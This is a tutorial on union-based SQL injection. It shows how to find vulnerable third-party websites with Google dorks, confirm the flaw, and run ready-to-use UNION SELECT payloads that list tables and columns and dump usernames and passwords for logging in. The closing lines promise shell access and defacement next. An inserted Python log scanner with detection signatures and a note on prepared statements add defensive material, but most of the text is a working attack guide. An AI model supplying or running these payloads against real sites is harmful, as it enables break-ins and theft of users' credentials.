What is SQL Injection?
SQL injection is an attack method used to steal important data, such as passwords, from websites that are vulnerable to it. By exploiting the flaw, an attacker can retrieve the admin password stored in the website’s database.
The SQL injection method is divided into several types, such as Union-Based, Error-Based, POST, Blind, and MSSQLi.
Follow these steps to use the SQL injection Union-Based method:
Vulnerable Column → Table → Columns → Data
SQL Injection Procedure:
Step 1: Select an SQL-vulnerable website
First, choose a vulnerable website using a search dork. Some common dorks are:
inurl:index.php?id=
inurl:page.php?id=
inurl:article.php?id=
inurl:news.php?id=
By searching these keywords on Google, you will find several potential sites.
Vulnerability Check:
After using a dork, you may find many sites, but not all will be vulnerable to SQL injection. So, you need to check if the site is vulnerable. Use the following method:
Add certain symbols after the website’s URL parameter to check for vulnerability. For example, if your selected site is:
www.sqliss.com/news.php?id=2
Then to test for vulnerability, modify the URL like this:
www.sqliss.com/news.php?id=2'
Extracting Vulnerable Columns:
In the previous step, we identified the number of columns. Now, let’s find out which column is vulnerable. We will use this vulnerable column to inject queries and extract the required data.
Query to extract a vulnerable column:
Use the following query:
www.sqliss.com/news.php?id=2'+union+select+1,2,3,4,5,6--+
When you run this query, the vulnerable column number will be displayed on the webpage.
Extracting the Database Tables:
After identifying the vulnerable column, you can use it to extract the website’s database tables. For example, if column 4 is vulnerable, inject the following query:
www.sqliss.com/news.php?id=2'+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+where+table_schema=database()--+
This query will display the website’s tables. Next, you’ll need to extract the columns from these tables.
Extracting Columns:
This step is similar to the previous one, but with a small change in the query:
- Replace group_concat(table_name) with group_concat(column_name).
- Replace information_schema.tables with information_schema.columns.
Query:
www.sqliss.com/news.php?id=2'+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_schema=database()--+
This query will show all the columns in the website’s tables. For example, the Users table may include columns like UserName and Password. You can now extract data from these columns. This query will display all columns, but you can also modify it to display columns from a specific table.
Printing Data:
In this final step, you will retrieve the usernames and passwords from the website. Use the following query:
www.sqliss.com/news.php?id=2'+union+select+1,2,3,group_concat(Password,0x3a,UserName),5,6+from+users--+
Since the columns contain the data, the webpage will now display the usernames and passwords. With this information, you can access the website.
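Seen from the server side, each request in the steps above leaves a recognizable trace in the web server's access log. The following is an added example, not part of the original tutorial, that scans Common Log Format lines for those traces. The log lines, IP addresses, the search.php path and the signature names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Patterns derived from the request strings shown in the steps above.
SIGNATURES = {
    "quote_after_number": re.compile(r"^\d+'"),              # id=2'
    "union_select": re.compile(r"\bunion\b.+?\bselect\b", re.I | re.S),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "trailing_comment": re.compile(r"--\s*$"),                # --+ decodes to "-- "
}

# Common Log Format: client IP first, request line in the first quoted field.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

def classify(target):
    """Return the sorted signature names that match any decoded query value."""
    hits = set()
    # parse_qsl percent-decodes and turns '+' into a space, as the server does.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(label for label, rx in SIGNATURES.items() if rx.search(value))
    return sorted(hits)

def scan(lines):
    """Return (client_ip, request_target, hits) for every line with a match."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (hits := classify(m.group(2))):
            findings.append((m.group(1), m.group(2), hits))
    return findings

# Constructed sample log (documentation IP ranges); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=student+union+events HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /news.php?id=2\' HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2024:10:01:30 +0000] "GET /news.php?id=2\'+union+select+1,2,3,4,5,6--+ HTTP/1.1" 200 5200',
    '203.0.113.9 - - [01/Jan/2024:10:02:10 +0000] "GET /news.php?id=2\'+union+select+1,2,3,group_concat(table_name),5,6'
    '+from+information_schema.tables+where+table_schema=database()--+ HTTP/1.1" 200 5400',
]

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, hits, target)
```

Signature matching of this kind is a triage aid and can be evaded by alternative encodings. The durable fix for the flaw the tutorial relies on is to bind the id value as a query parameter (prepared statement) and reject non-numeric input.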
This was a basic tutorial on SQL injection Union-Based methods. In the final section, we will cover topics like the admin panel, shell access, defacing websites, and creating mirrors.